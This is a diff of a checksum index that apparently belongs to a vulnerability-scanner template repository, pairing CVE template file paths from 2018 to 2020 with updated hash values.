+http/cves/2018/CVE-2018-2791.yaml:0540019c35685def3f3f4bb35654bc1b8d58fe6c +http/cves/2018/CVE-2018-2894.yaml:33f92b93d1a2bea773ad9f669ac9a933362215ae +http/cves/2018/CVE-2018-3167.yaml:c5abd55d838d66fc0f0be6d514a0cd5b69b114ca +http/cves/2018/CVE-2018-3238.yaml:8f0fb36990796d64929c578c2c7c7728fdc3c255 +http/cves/2018/CVE-2018-3714.yaml:2c463347f1047ab8d829fed41ac70f545d575a40 +http/cves/2018/CVE-2018-3760.yaml:6c3d6720cc4ad2fec563c96ce8ae6a053da78c99 +http/cves/2018/CVE-2018-3810.yaml:42f89ff633759221fa57a64f6184c42918fa54f5 +http/cves/2018/CVE-2018-5230.yaml:f159c1871b970e9ac7d3bcdc5ba236f71387d218 +http/cves/2018/CVE-2018-5233.yaml:ad017c0eec6220e5287cb074cb293439a536dba0 +http/cves/2018/CVE-2018-5316.yaml:14d10a78fca02203e591c4fb735897fa9a91e73f +http/cves/2018/CVE-2018-5715.yaml:adbd534c65ccb1ba6b5e4eeacccf3bd995b18ce5 +http/cves/2018/CVE-2018-6008.yaml:45bdcbec7a32c740960a59a712a3339d0346c3fe +http/cves/2018/CVE-2018-6184.yaml:68822b7ca1ec9687f956045736d9dd6397852fc5 +http/cves/2018/CVE-2018-6200.yaml:1a978f8b2e72b375734bab19ffe4174f8872275c +http/cves/2018/CVE-2018-6530.yaml:7d80d08f7edc1e3335cd96e08e4ed4e70ca1cf0c +http/cves/2018/CVE-2018-6910.yaml:4477e1065475af78bfa4040645c2b963b0ba6e11 +http/cves/2018/CVE-2018-7251.yaml:0b334b4608ccaf301b16b645e9eef12792ee2646 +http/cves/2018/CVE-2018-7282.yaml:11470d270d3726f35e276c8f28743726c08eb871 +http/cves/2018/CVE-2018-7422.yaml:72cdaca5b381fbe847b876b871a8117441facf81 +http/cves/2018/CVE-2018-7467.yaml:27732efa62475b2ffd975136a1bdf9aa0f63893e +http/cves/2018/CVE-2018-7490.yaml:548a095db0c9e426107e9395978500fc1d279604 +http/cves/2018/CVE-2018-7600.yaml:a24f06a82264ce109a8ffbfcf9afe24d1f112629 http/cves/2018/CVE-2018-7602.yaml:dca7b590e5c976bc3b4a9c80029b0b258857a2b8 -http/cves/2018/CVE-2018-7653.yaml:703910db748c89e1a98f9c196f082e2d521a1243 -http/cves/2018/CVE-2018-7662.yaml:56f51e240260f1bea6b61465066e7fecb5ca1889 -http/cves/2018/CVE-2018-7700.yaml:4ec3f54a99ce451f6d465c6a124087fe7a893dd6 -http/cves/2018/CVE-2018-7719.yaml:beece4b144506e226e26b175ae33c46ee3a5ec97 -http/cves/2018/CVE-2018-8006.yaml:2b457794267576ade05ec5c28a3fdfad5e72fbc9 -http/cves/2018/CVE-2018-8033.yaml:97ae7108e4d4db2d2630d07d4987be81a0f9fb23 -http/cves/2018/CVE-2018-8715.yaml:4c3e4b8f3caa98e6aba3deec5e256f0a80e0488c -http/cves/2018/CVE-2018-8719.yaml:d44cd29995f702b2ca58ead92abfa68cfe45dd11 -http/cves/2018/CVE-2018-8727.yaml:7b6e2e017292476c35d30d03fc68f699bb275222 -http/cves/2018/CVE-2018-8770.yaml:bec1e97c65c353ffe8d712fe632fd86e2c74fdb0 -http/cves/2018/CVE-2018-8823.yaml:7d05ae31f08d1e566025cf331325a8f03c56ae15 -http/cves/2018/CVE-2018-9118.yaml:4ae6a54d079a6f7ef2b133692b285be845258d09 -http/cves/2018/CVE-2018-9161.yaml:70ad0361f6188f82a7a254533927813e681939ef -http/cves/2018/CVE-2018-9205.yaml:9b8b03bbfc788d2b7aa730b0e1c0a402e994ead8 -http/cves/2018/CVE-2018-9845.yaml:4df8f3c3a6280263e310103834ad652a960bf2ec -http/cves/2018/CVE-2018-9995.yaml:9731a4d5885d174822384fb90320c8aa00764ee8 -http/cves/2019/CVE-2019-0193.yaml:cee367d358900af4c2fff6991a5a4f7144eae4c7 -http/cves/2019/CVE-2019-0221.yaml:995605bda369c812082a9d15dc2a605192ca578c -http/cves/2019/CVE-2019-0230.yaml:aa05f8b349286839655bc4922ba07bbea20af330 -http/cves/2019/CVE-2019-10068.yaml:53277d09488ebebc7179623a13fa8d476696c9fa -http/cves/2019/CVE-2019-10092.yaml:501060feaaf29e6409736ff4719834ae5d249bbc -http/cves/2019/CVE-2019-10098.yaml:779779c11d2242160bacadc99d6bac94e5b5cbd3 -http/cves/2019/CVE-2019-1010287.yaml:9be533c38a83005237249f00b3960af112657310 -http/cves/2019/CVE-2019-1010290.yaml:352f81e348ce352febe3e1bb1fc584f107d40720 -http/cves/2019/CVE-2019-10232.yaml:1c1e6037d7f614c607fc69f615c2e9de3a072890 -http/cves/2019/CVE-2019-10405.yaml:404434eff84d7e1138c28898776387bab1de15c1 -http/cves/2019/CVE-2019-10475.yaml:895358f8051cd06f10d9fa5adf7cd620e9cc7ddb -http/cves/2019/CVE-2019-10692.yaml:5c03086eaa2688a2a121e1d2c3f720f32ea2fd2f -http/cves/2019/CVE-2019-10717.yaml:85e7d0a6ba236feeb3a0ab78c5ac9be519d29a87 -http/cves/2019/CVE-2019-10758.yaml:034f6b66349c5faef01e5145d7b9599ef913f93a -http/cves/2019/CVE-2019-11013.yaml:f07fc7f30d4d1ce506f7b7948cf5f85acbe9e0d4 -http/cves/2019/CVE-2019-11248.yaml:c4ba901559fd1d284fb17729a459afafce9c7811 -http/cves/2019/CVE-2019-11370.yaml:ad47c9427fad25d75b80abeef4ebabebd5b9eaec -http/cves/2019/CVE-2019-11510.yaml:17e589b3683131877b2efcc90154bf0bf4fff282 -http/cves/2019/CVE-2019-11580.yaml:8490e17ef1b0df152c95860ef824c290047b976f -http/cves/2019/CVE-2019-11581.yaml:b7bf7a6a70623f16e407350324d27541bef67b29 -http/cves/2019/CVE-2019-11869.yaml:7906a5135747f2c92a6be897cd96f9c0e87e9a45 -http/cves/2019/CVE-2019-12276.yaml:a571dfefa00ddffa8532aad6e98472c07720838d -http/cves/2019/CVE-2019-12314.yaml:d546eb5b44226361cdee7e8ea35f343ca3ac004e -http/cves/2019/CVE-2019-12461.yaml:b38edbee2186f2c0ac41e5cb9e203dba1d7fda55 -http/cves/2019/CVE-2019-12581.yaml:433e6c288a345066398356b4d24ed61cc7684c7f -http/cves/2019/CVE-2019-12583.yaml:b80cf45a028462b1040ce53f8b0bdea0fe773999 -http/cves/2019/CVE-2019-12593.yaml:f9ed3a626d050247d1150aeb61e7e06aa30860d5 -http/cves/2019/CVE-2019-12616.yaml:bd35332d9f56c19e63e9b3d90fcdd4f4965e36fe -http/cves/2019/CVE-2019-12725.yaml:0a9c9d7996d8eb062d9a61fe664114f9b2e8441a -http/cves/2019/CVE-2019-12962.yaml:04dee817ef2ec6dd6614a62f701afb05854805ba -http/cves/2019/CVE-2019-12985.yaml:56ba5d3e9d9bdcd7f70eb114b2f85eb71e088526 -http/cves/2019/CVE-2019-12986.yaml:9bb2a91fa080fe65c9d82a6c9d25110d465c5128 -http/cves/2019/CVE-2019-12987.yaml:4edc04d1768efdfe6bdc01d2dee4410e1aac345d -http/cves/2019/CVE-2019-12988.yaml:c8697d536964ad3c4406d9c2ea3dc25d280b43ba -http/cves/2019/CVE-2019-12990.yaml:dc764c8e02dfedf44bb1a40217d50b7844931e3b -http/cves/2019/CVE-2019-13101.yaml:fdde34218507d54690a8a590c56603e0df08f7bf -http/cves/2019/CVE-2019-13392.yaml:62ca1ce2a5c74bdfb0ce70315d27dea7e1a17d6a -http/cves/2019/CVE-2019-13396.yaml:5ccb153a0e2cb93f72ed7f1a8ebefb5495f5b96b -http/cves/2019/CVE-2019-13462.yaml:8d7decf59eafb6d2f03cee205a23c10447c52fc0 -http/cves/2019/CVE-2019-14205.yaml:188f7de5a654f222b8b71dd7702222df47605473 -http/cves/2019/CVE-2019-14223.yaml:29fedf5c141eb2ee88201a554b1a90ab09f455b6 -http/cves/2019/CVE-2019-14251.yaml:d2d69020e23f6074237cd1132276277390bb562d -http/cves/2019/CVE-2019-14312.yaml:63f654943f1ad3b56fa117edf96403f4bee1a534 -http/cves/2019/CVE-2019-14322.yaml:5b92182076894a292bae87e70adf5f06da2d0987 -http/cves/2019/CVE-2019-14470.yaml:66cb23d17cd7467db6774be4bb39ee89cd707e51 -http/cves/2019/CVE-2019-14530.yaml:40bfa6aca70f049ca24436a317a25ad1f99c7881 -http/cves/2019/CVE-2019-14696.yaml:0e176fedb24798ab8397c5b608c1f4242c19157c -http/cves/2019/CVE-2019-14750.yaml:a0f4122e4ea93cb2e01269674d186f25c583ddb5 -http/cves/2019/CVE-2019-14789.yaml:300ddf7dcfb01aa0af7d07e81a63a30029eacbc3 -http/cves/2019/CVE-2019-14974.yaml:0f2943aea61926458dc827a1d5c04e34dc0ad378 -http/cves/2019/CVE-2019-15043.yaml:b676a6cedf2a868db9f3216122090a9e2c7817bb -http/cves/2019/CVE-2019-15107.yaml:1c3122dcac811692d3e08816b12196fc12b561f3 -http/cves/2019/CVE-2019-15501.yaml:6fe4f5ba3a27ddbd502d87ce3f2beb4fa29c804b -http/cves/2019/CVE-2019-15642.yaml:2f2676e4b068a3db4eba404cd7be1bb72d5305d4 -http/cves/2019/CVE-2019-15713.yaml:300e1e7a47355f067bef13f649874cbba255ae6b -http/cves/2019/CVE-2019-15811.yaml:d3af20a4b944a131c57ba657e7a2e154790b4ec4 -http/cves/2019/CVE-2019-15829.yaml:ee08fa53b36e1b84e8d2f83e26d9afa2e9efa9a5 -http/cves/2019/CVE-2019-15858.yaml:fa2f7675bd77e89e17a70c521bcfaf5e2e39ba25 -http/cves/2019/CVE-2019-15859.yaml:1ee89aea21a5397bc93e6c1d0b20df58edd767b6 -http/cves/2019/CVE-2019-15889.yaml:444496d589dd29e382d6880acc0e430df54e51a2 -http/cves/2019/CVE-2019-16057.yaml:b38b4f975c61fedb47788cc6e7f6bbd2219f57a5 -http/cves/2019/CVE-2019-16097.yaml:a4a2295cc692b49b6a72eadf59c3d67629b7d0e6 -http/cves/2019/CVE-2019-16123.yaml:0dc903a49794b7ff8d59db12aaa0ff2a9f8a67b9 -http/cves/2019/CVE-2019-16278.yaml:5b08ed65278ae9222ff6ccf3bab616bf873156b3 -http/cves/2019/CVE-2019-16313.yaml:60a119931ce1929e9225abc4f301e00dfac572a3 -http/cves/2019/CVE-2019-16332.yaml:75ad50aee53cbc20ff7097a678253a774d23c453 -http/cves/2019/CVE-2019-16525.yaml:5ee2b2c819a7741af14908a86e9546721ed06d31 -http/cves/2019/CVE-2019-1653.yaml:76531a770adf815dfcd7db63da4cdb92bfc425eb -http/cves/2019/CVE-2019-16662.yaml:187d404a5d1837d1fd5c7a400bee848c761bab5f +http/cves/2018/CVE-2018-7653.yaml:3c1ab0d0f467ecd1070063a4a78292ff69a8c6a9 +http/cves/2018/CVE-2018-7662.yaml:f7b87b8432791c4570ef63c9fd097615025a4915 +http/cves/2018/CVE-2018-7700.yaml:2f31f0d12533de421b88c83b78a919f067f058d3 +http/cves/2018/CVE-2018-7719.yaml:045baebc23102ca8f9a28622c522f30bc07e36a7 +http/cves/2018/CVE-2018-8006.yaml:095cef66d38e2a90ef2ab261d6ad3acd63202b85 +http/cves/2018/CVE-2018-8033.yaml:71fe391b47dddd12cb4367703d6b9496991b89b8 +http/cves/2018/CVE-2018-8715.yaml:bafc54693aa8d3c358ec3d0b2e1d6a986c356148 +http/cves/2018/CVE-2018-8719.yaml:0ea04b9f68db871f320f874aea1dfbeb951ecb57 +http/cves/2018/CVE-2018-8727.yaml:26acc1ddc4c5606be1b56617ff55baad8fc8d257 +http/cves/2018/CVE-2018-8770.yaml:d428848ff657f9ebb28abbd86103c86c20925187 +http/cves/2018/CVE-2018-8823.yaml:3a0fe080a24744877c3ebc2bbc7474781408e709 +http/cves/2018/CVE-2018-9118.yaml:9359d5a2cc3149230fc83fe8d84606e32b2fc618 +http/cves/2018/CVE-2018-9161.yaml:c949a25a456e33e11b18532add69f814534d2608 +http/cves/2018/CVE-2018-9205.yaml:bb7d103a3a8101640f94aadb22871769bccdfc0b +http/cves/2018/CVE-2018-9845.yaml:527046db8cd131e327d3444cb66b0020911607a6 +http/cves/2018/CVE-2018-9995.yaml:aa26348fb8cd7b7f75043c6eaf34d10325925e92 +http/cves/2019/CVE-2019-0193.yaml:23f93db0c10496e1bec23eeead564fdf9a4fd964 +http/cves/2019/CVE-2019-0221.yaml:8c9d11a321a18356bd382b6045b6a9cb4d4c2e49 +http/cves/2019/CVE-2019-0230.yaml:f96052622a401cf24db579112eefd1b7afa6e927 +http/cves/2019/CVE-2019-10068.yaml:bac35a2fd5a624fc8d3e67b3659af07d6fb66ab9 +http/cves/2019/CVE-2019-10092.yaml:bd6ea838cbd25ca04bce5c08323b9b8caf1abeed +http/cves/2019/CVE-2019-10098.yaml:c94ddc7312dac8034b426cb70978902080f2a655 +http/cves/2019/CVE-2019-1010287.yaml:34ed8b2befc6a04ff82081bcf39b2f96e314931b +http/cves/2019/CVE-2019-1010290.yaml:a6519e51fd5afaddbeeb66355859a37884dccd96 +http/cves/2019/CVE-2019-10232.yaml:90fcc93b1b401082602cc6ebcfa9b44b03eb5ff7 +http/cves/2019/CVE-2019-10405.yaml:f868556748a61a665d4db35b4c2f13a0f8225c05 +http/cves/2019/CVE-2019-10475.yaml:ea3d2b066bcdf392e466fe1289490b6f4888ac71 +http/cves/2019/CVE-2019-10692.yaml:5021a450e7400b2c856fc5fa6604acf048cc86f1 +http/cves/2019/CVE-2019-10717.yaml:524d8a06d6cdb74842ec656b8029a0ac08343ae8 +http/cves/2019/CVE-2019-10758.yaml:11a3a47b853492fd79779562d61e5df6d38f32f5 +http/cves/2019/CVE-2019-11013.yaml:fd70f623d660efcecdca7756ed87b92c10a9fc42 +http/cves/2019/CVE-2019-11248.yaml:8572b52cf5182f109e5383d8d46fbc5027ed0db2 +http/cves/2019/CVE-2019-11370.yaml:165e342998c70067936ecb7829e3a785170b65f9 +http/cves/2019/CVE-2019-11510.yaml:3b09cc2a4e8af2546be39254a282a0e4cd19a152 +http/cves/2019/CVE-2019-11580.yaml:d2b3be8897488c6aa16a5758860aa74901ef2729 +http/cves/2019/CVE-2019-11581.yaml:68a416c114092a01a177da07141a2fbe3801820a +http/cves/2019/CVE-2019-11869.yaml:1ab1728c03fa5798c75d9785ed7150fe49fca0a5 +http/cves/2019/CVE-2019-12276.yaml:a1e597c171ff6f02edfba7125f076b071711c6f7 +http/cves/2019/CVE-2019-12314.yaml:9dcf711e22c98170b67a9f23fbc0551de5113364 +http/cves/2019/CVE-2019-12461.yaml:0ddbb910616bfc58a86337dfcae4ca9b9854fe71 +http/cves/2019/CVE-2019-12581.yaml:381b1ebfaad4393b465a7ecd3b4f61b8a242e707 +http/cves/2019/CVE-2019-12583.yaml:deb17a9f94f6b996f518d77238491cb8f4aa030f +http/cves/2019/CVE-2019-12593.yaml:1edd14e653428fe2e7e8d52ed97d8377b6014cd5 +http/cves/2019/CVE-2019-12616.yaml:114b100be5ac9c597b7011c7df4ed31ab39bf49a +http/cves/2019/CVE-2019-12725.yaml:a064ce191c0ebfccbf2b8c2c9bd118fef406f13c +http/cves/2019/CVE-2019-12962.yaml:ec431e6712561071fc8639eb4dd447f502a7df66 +http/cves/2019/CVE-2019-12985.yaml:40c41752e3f22c8f82f1de434eff3738c63afde7 +http/cves/2019/CVE-2019-12986.yaml:84c655aac2dd276873c474d57e017e6b80b1302c +http/cves/2019/CVE-2019-12987.yaml:f4523f0cba35e78138112d4dc4d9f12932e5214d +http/cves/2019/CVE-2019-12988.yaml:c4b2151b375892c2e4300eec39eae1ae2f8e109b +http/cves/2019/CVE-2019-12990.yaml:861526a217f76d601f0e7ad765e11bc67c25715c +http/cves/2019/CVE-2019-13101.yaml:27567d52287f984934ad5b316992dc62704a593a +http/cves/2019/CVE-2019-13392.yaml:f646158cd156be2e0566467ea528ef24556d63b1 +http/cves/2019/CVE-2019-13396.yaml:baba96c27ee3b54fa7b903bf4f40917351ea3bc1 +http/cves/2019/CVE-2019-13462.yaml:db5e14d4ecf0cd1aa8deec05dc3c8090eceb80b2 +http/cves/2019/CVE-2019-14205.yaml:51742d7c926daad501bc27941b5f0d52e42df7c7 +http/cves/2019/CVE-2019-14223.yaml:031b5f227deda9255405b855d724fad9ef6b6e60 +http/cves/2019/CVE-2019-14251.yaml:2756dd2e7bbd4ddbe122251d1c58459fd896fb37 +http/cves/2019/CVE-2019-14312.yaml:5c007be32b6f692cd0545b60a438f0fec444c45c +http/cves/2019/CVE-2019-14322.yaml:8191235b82e82264ced10d8545127cec63696a9d +http/cves/2019/CVE-2019-14470.yaml:da856445991a36c4791a0856febbbc18eb0264db +http/cves/2019/CVE-2019-14530.yaml:bc4af1df606f5f36a68487c2e64d13e3b698563c +http/cves/2019/CVE-2019-14696.yaml:8ef818d1e5d6726a1edc26d343a122b094e59496 +http/cves/2019/CVE-2019-14750.yaml:cbb120e5fd4c66e7ad5e2976c7b076f1697f7fe9 +http/cves/2019/CVE-2019-14789.yaml:091c53806c80dd127da4f59eaba3e8a48cb1c01e +http/cves/2019/CVE-2019-14974.yaml:7aad542394ce6741009ae2420d736441c1c88013 +http/cves/2019/CVE-2019-15043.yaml:7031e9d4761cd2b6595bc6bc9ec0f82ea967ceb2 +http/cves/2019/CVE-2019-15107.yaml:7009038a165670c3b82080be2de4126a8a158a8c +http/cves/2019/CVE-2019-15501.yaml:813d0af614fb52e4abab1de5440d6567fba83c0a +http/cves/2019/CVE-2019-15642.yaml:a1651cbfba7d120fc7603f51fe22c8668ee480cb +http/cves/2019/CVE-2019-15713.yaml:bfd8ed184e7e4afe941f2516c8af9a07464fa884 +http/cves/2019/CVE-2019-15811.yaml:a75f488e0fc88d8329dce9e70c402689047e348e +http/cves/2019/CVE-2019-15829.yaml:7bbb83f9eedcb8e719bdfb294f956f3f89542cf6 +http/cves/2019/CVE-2019-15858.yaml:0a49cdaa0515ba08ea7f2e290120888551119ea1 +http/cves/2019/CVE-2019-15859.yaml:9218f668d2b3ec53fa664ee0be1a150ddbcbfebf +http/cves/2019/CVE-2019-15889.yaml:082ef175790d45026fd417bbb5ac98898133a392 +http/cves/2019/CVE-2019-16057.yaml:e4ff4dd25aed0a8587cb78e9816eaeb195cc9bd1 +http/cves/2019/CVE-2019-16097.yaml:d629988c402003e2e9ea80bf63ca4817caf43ce1 +http/cves/2019/CVE-2019-16123.yaml:0c27ff880fd99df9215b56261e6d5bafd8289d7d +http/cves/2019/CVE-2019-16278.yaml:edb5c99896209e41a072c25584a3d6a59b1caa7c +http/cves/2019/CVE-2019-16313.yaml:4a81c1c94a8275ee0108bf6da5aac0ee6ccd3d45 +http/cves/2019/CVE-2019-16332.yaml:765477328f0ec4c54ec69ccc36f715e1b12c35cc +http/cves/2019/CVE-2019-16525.yaml:3d422b4805132c51421e2233798e353eab5a72fa +http/cves/2019/CVE-2019-1653.yaml:a5b9a7c2887722cfd6b4c6bce02672feee9c892c +http/cves/2019/CVE-2019-16662.yaml:396df8f84ef489b1a383fa339d82bd65719acd80 http/cves/2019/CVE-2019-16759.yaml:4c0decc838d103b8d27d55b4c9c1ad0d0c9d3649 -http/cves/2019/CVE-2019-16920.yaml:b0adcd84a6a5338cdaa49eda911a8d8a5ea02321 -http/cves/2019/CVE-2019-16931.yaml:5afc1ff1f9f6482de069e43a6dd1936acef62c92 -http/cves/2019/CVE-2019-16932.yaml:7441e19bc37427ee4e4de47c10808b3827555da9 -http/cves/2019/CVE-2019-16996.yaml:7a59e41de1ecc8310272940b70fb7a3f19b4b82c -http/cves/2019/CVE-2019-16997.yaml:bd32f8e2674394e81c30468b7cbbe2d3fdbf42e9 -http/cves/2019/CVE-2019-17270.yaml:7966b5509933384db224775a39e26635367e1566 -http/cves/2019/CVE-2019-17382.yaml:4528c4b8517d8a2b6057b3ab43919761424087e3 -http/cves/2019/CVE-2019-17418.yaml:f95453cb993c628b3aa3587e9c6b61a49730339c -http/cves/2019/CVE-2019-17444.yaml:e327752a15c760e7985c1a52213167978eee014c -http/cves/2019/CVE-2019-17503.yaml:14407d0acda6c6eb6ad577a7ffcfbcabfdf53faa -http/cves/2019/CVE-2019-17506.yaml:0588d5bee1aab9b7750821138241bc94089db60d -http/cves/2019/CVE-2019-17538.yaml:dbd6e26a2382aef32c6d89c6929269872f865226 -http/cves/2019/CVE-2019-17558.yaml:db08545d6fb03cafefc589bc01ea050432f9b78d -http/cves/2019/CVE-2019-17574.yaml:e63556b383a123245b7b4a936fdbc95b4f3cca84 -http/cves/2019/CVE-2019-17662.yaml:18c74a4525e9e602c515fcbd7a4538289515368c -http/cves/2019/CVE-2019-1821.yaml:7cefe155047e5db29a43ea1f4354d99f5bd3b66d -http/cves/2019/CVE-2019-18371.yaml:93f52defc65852edb22b34be8efd6b003b83d3b1 -http/cves/2019/CVE-2019-18393.yaml:8c777f9547072d87fb0a43a15e9d081469903926 -http/cves/2019/CVE-2019-18394.yaml:bdc6459cca04184aa91b2d025d0129423447c52e -http/cves/2019/CVE-2019-18665.yaml:d573abad3500b005bd68d4a052c35907617d7198 -http/cves/2019/CVE-2019-18818.yaml:f38de4afa9c2eef7015197b381722c0e820ef6bd -http/cves/2019/CVE-2019-18922.yaml:330a4cef1008383c2ac960e35bcae15e64a3e652 -http/cves/2019/CVE-2019-18957.yaml:aacd228f1b2eebaaddfb5fdbed8a07e6d0c080e2 -http/cves/2019/CVE-2019-1898.yaml:e614e18edd9e97eb4dfd276fd21e0e12f9a95272 -http/cves/2019/CVE-2019-19134.yaml:3aaededce28910b5cfe0e1a1c5761cd49d7be3a9 -http/cves/2019/CVE-2019-19368.yaml:78d4c6549a1374b79c8586bdc00b88b77162cb8d -http/cves/2019/CVE-2019-1943.yaml:37e6f271fe964ef20c8ea807cb0df1bef5c6d89e -http/cves/2019/CVE-2019-19781.yaml:6cc3fc415efbb50ba0808ff0f2e8abe8fcdf7c03 -http/cves/2019/CVE-2019-19824.yaml:6b0556033a589096f2a13dae773beda419644cd6 -http/cves/2019/CVE-2019-19908.yaml:35a33669e370cc0f6ffeaf5f4f1216e40f857469 -http/cves/2019/CVE-2019-19985.yaml:8a3223b99b80d588d8b739edc6b65b032a63d6e4 -http/cves/2019/CVE-2019-20085.yaml:25857b3cbe7a25b59ed8897116197063921468b6 -http/cves/2019/CVE-2019-20141.yaml:81452521f22f7fd7fe5e856390378a24e7843f70 -http/cves/2019/CVE-2019-20183.yaml:59b69a0dafde24556ba68903816a03130237de24 -http/cves/2019/CVE-2019-20210.yaml:28e331d5179952c5ea72ed1ec3b681a502693d41 -http/cves/2019/CVE-2019-20224.yaml:4b57468f58bec3572eac6e316f19d5321f0a7adc -http/cves/2019/CVE-2019-20933.yaml:e3c28fb74b286357176c8a8a9c6a5fe03124e970 -http/cves/2019/CVE-2019-2578.yaml:d9859f18a046c883f5be1c38578c61bd0ec59967 -http/cves/2019/CVE-2019-2579.yaml:691e84d0d8ab8e2b04181eab4dbc20595143314a -http/cves/2019/CVE-2019-2588.yaml:595cd481716d6f2693ddd1c0fbb752860483317e -http/cves/2019/CVE-2019-2616.yaml:a9695f3ef2c7955a1177167713717be184de9b02 -http/cves/2019/CVE-2019-2725.yaml:332e11400675ef8de33091aee3ddae6e997307dd -http/cves/2019/CVE-2019-2729.yaml:a7ef7840f89c60186650ec11a34d1d8732d953e8 -http/cves/2019/CVE-2019-2767.yaml:78afa0439ce5211b8766dfcff702af103d54c6f1 -http/cves/2019/CVE-2019-3396.yaml:acfcf6acc8db5d06fce9109946e0d1fae7c0388b -http/cves/2019/CVE-2019-3398.yaml:0aabef176b63115b87f8a23b1a9552a4b56f7fbc -http/cves/2019/CVE-2019-3401.yaml:39188fcd2c2379590603330bd011658575ab4ad1 -http/cves/2019/CVE-2019-3402.yaml:b862eb8b13adb20c856dcdd9f8d60a72c899bff2 -http/cves/2019/CVE-2019-3403.yaml:7ba43cd50951e150cc1621ce1da2f40a1589e084 -http/cves/2019/CVE-2019-3799.yaml:84eabdb6ef1e616aef86d2138c9968e9446f182f -http/cves/2019/CVE-2019-3911.yaml:6d8b517d34889576fa73c1a6e2780be3d92388d8 -http/cves/2019/CVE-2019-3912.yaml:eae144178ad0ffb6ee2d09bc423749130e26bb31 -http/cves/2019/CVE-2019-3929.yaml:b09f6da70a1c26974942e15358ef6c926a14efe2 -http/cves/2019/CVE-2019-5127.yaml:d914b578899b337cd0a795c51673aad75f541e88 -http/cves/2019/CVE-2019-5418.yaml:d7d7e69c34412510e4af55bb95c11a3d6e2fa5cc -http/cves/2019/CVE-2019-5434.yaml:cd5f31e6718b7d490dfe7bcf55893de7f7828be9 -http/cves/2019/CVE-2019-6112.yaml:1d73991e2bdcb18dd204ef219f2371cd5170933f -http/cves/2019/CVE-2019-6340.yaml:0fa0958d8b14db1bb785679a01fd0af101f63dfd -http/cves/2019/CVE-2019-6715.yaml:b2cc8cb6bd2864246b6d944b8fe35c6a7aec95e6 -http/cves/2019/CVE-2019-6799.yaml:5501838b3f36d9bbbf8476000896405cf0facd10 -http/cves/2019/CVE-2019-6802.yaml:4a302f514222dbc94e4c1563cc3a1e0a608d6d5c -http/cves/2019/CVE-2019-7192.yaml:21a4d196239173dc547cf909542d0046f69e2955 -http/cves/2019/CVE-2019-7219.yaml:8b8a0417029a1981936dd0225c982e7e04f90b03 -http/cves/2019/CVE-2019-7238.yaml:81c41ce43c0eb2c430c5875077366e4a7f2d2223 -http/cves/2019/CVE-2019-7254.yaml:8bc74c07b250e90448dd7a51f50dedb9b85818e5 -http/cves/2019/CVE-2019-7255.yaml:2b022b4f3816a1b0d8bf36c15674c187e8f2b9b4 -http/cves/2019/CVE-2019-7256.yaml:bfbfb5842df2ee69043e5d78184e68dfaead5287 -http/cves/2019/CVE-2019-7275.yaml:5d56ae716dcf89dbb8d9e582de090c3f86ed62cf -http/cves/2019/CVE-2019-7315.yaml:b9443b80906636f841b697e1dc65b8c60a0eba69 -http/cves/2019/CVE-2019-7481.yaml:f1a330e7215aa9788fc6a36215150b80cdae734a -http/cves/2019/CVE-2019-7543.yaml:aebf9b689e0332ee1fc8157ea1e6c7ea7b52d665 -http/cves/2019/CVE-2019-7609.yaml:cc5d8252a5819a8379ca529310554111e3872174 -http/cves/2019/CVE-2019-8086.yaml:603d416fe2a6ba0d8b00db820ee2ac9e715d340c -http/cves/2019/CVE-2019-8390.yaml:bd8543dfbbed3d81e9c67a8c39e13829a42b3a30 -http/cves/2019/CVE-2019-8442.yaml:e22f01d228f4bb0e1dc2c35e800fbb4b7f693c9d -http/cves/2019/CVE-2019-8446.yaml:28123fb76fac211c0d17e256f46eb29ca254508b -http/cves/2019/CVE-2019-8449.yaml:dd9bc2bc241af94349e9fd96c904b4bdf81b3e15 -http/cves/2019/CVE-2019-8451.yaml:5c36053a8d919a7fe13b4da595da1ebb123c2e6e -http/cves/2019/CVE-2019-8903.yaml:0c97147ea52be83802aa297dbd99b59946ed6ccc -http/cves/2019/CVE-2019-8937.yaml:f6822b9047726dc534f0b1f32f4904eeaa14b5f1 -http/cves/2019/CVE-2019-8982.yaml:9590d37f3450e68b12d920a2bab6948e262e838c -http/cves/2019/CVE-2019-9041.yaml:8b6a847e95d598701966298fc2d0ca0218b736a8 -http/cves/2019/CVE-2019-9618.yaml:1ee638878818809497485509391ff5d0d5d574b4 -http/cves/2019/CVE-2019-9670.yaml:ddc53e8f1afcb1aef29ffc6ccc38d1f924dde66c -http/cves/2019/CVE-2019-9726.yaml:8bef7fff591580af94509f8c28a035462e8caf34 -http/cves/2019/CVE-2019-9733.yaml:f43a5f7086eadb7a7bf231c719e402fc947bee18 -http/cves/2019/CVE-2019-9915.yaml:8438b3914b0ae60c0669408b6e445df1fb61cf27 -http/cves/2019/CVE-2019-9922.yaml:f05bde3ad4e3311a82a8c0eecb594ae427a9ea97 -http/cves/2019/CVE-2019-9955.yaml:b863683d48fd4e91725ef291fbd0065acf2b02a3 -http/cves/2019/CVE-2019-9978.yaml:aa322b1aea70d45167e90f45bf9a5c0c29c08aec -http/cves/2020/CVE-2020-0618.yaml:ab16071142d9ca737af7c0f06196c8f5d23310cf -http/cves/2020/CVE-2020-10148.yaml:6f12eb56e9c6dd0f5451255df89e36fc17edba37 -http/cves/2020/CVE-2020-10199.yaml:61dd3065d7d3f820baa2254c1406c34690a55f24 -http/cves/2020/CVE-2020-10220.yaml:8f0f3d56baaf9e54a2c91cca0474f5b561d528f2 -http/cves/2020/CVE-2020-10546.yaml:c159673e49b9c1221cf799b52b3263cdef058158 -http/cves/2020/CVE-2020-10547.yaml:603c225287adb1da3843cbd1a2e4819eccde1189 -http/cves/2020/CVE-2020-10548.yaml:81cffe213c0f0d47008b9b907c495514da542561 -http/cves/2020/CVE-2020-10549.yaml:3adb8ca6b87069f220be0f420ba5076b00aa80d4 -http/cves/2020/CVE-2020-10770.yaml:2ed0fa9b93f146fd8a17e1ab66603af77d91a4c1 -http/cves/2020/CVE-2020-10973.yaml:f63ca99dee81e3692490fc90dc8c540f06aa6976 -http/cves/2020/CVE-2020-11034.yaml:e2711e66ad55d14f817469d3fc927747a33ec3eb -http/cves/2020/CVE-2020-11110.yaml:b86a59791784d1c6b7a8084769edc13aa52bb518 -http/cves/2020/CVE-2020-11450.yaml:22ef589cb726f1f71f875fe50c6bb6027750b3d4 -http/cves/2020/CVE-2020-11455.yaml:ef9283c685e4caeee621f8234eb78441fa0a7d52 -http/cves/2020/CVE-2020-11529.yaml:b241a14306580e855ffdc3730c660e84e42805db -http/cves/2020/CVE-2020-11530.yaml:6614a1ba3dee7088e7dfed2ee9c1c0e42d966670 -http/cves/2020/CVE-2020-11546.yaml:43425a5f189bc9b3a2cac0a321b3cd395c8c3d49 